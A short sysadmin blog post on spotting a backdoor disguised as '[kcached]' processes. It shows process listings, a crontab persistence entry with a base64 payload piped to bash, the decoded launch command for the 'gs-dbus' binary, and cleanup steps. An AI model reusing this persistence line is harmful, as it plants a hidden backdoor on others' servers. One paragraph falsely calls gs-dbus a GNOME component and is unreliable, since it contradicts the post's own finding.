How to deal with malicious kcached processes

2225  admin  

If you find something like below on your server, be sure you’ve detected malicious activity

username 2156075 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156076 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]

You can use the lsof command to determine which processes have the files open and whether they are being used for legitimate purposes. If you are unsure about the legitimacy of these files or the processes using them, it may be helpful to consult with a qualified system administrator or security expert.

root@server1 [~]# lsof -p 2156075

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156075 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156075 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156075 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus

Here you go:

ls -1 /home/username/.config/dbus/gs-dbus*

/home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus.dat

The files you see appear to be related to the gs-dbus process, which is a component of the GNOME software suite that manages D-Bus connections for graphical applications. The files in question are likely configuration files and data files used by this process.

It is not uncommon for these types of files to be owned by a user, especially if they are related to user-specific settings or configurations.

Inspect crontab of the given user:

root@server1 [~]# crontab -lu username

# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel

If you decove the base64 line you will see more:

/usr/bin/pkill -0 -U2438 gs-dbus 2>/dev/null || SHELL=/usr/local/cpanel/bin/noshell TERM=xterm-256color GS_ARGS="-k /home/username/.config/dbus/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/username/.config/dbus/gs-dbus'" 2>/dev/null

Recommendations:

– Don’t ignore the case
– kill the processes
– remove the files
– remove the cron
– reset all passwords for affected user
– scan account additionally using some good scanner
– notify the client

Similar Posts:

    None Found

Leave a Reply

Your email address will not be published. Required fields are marked *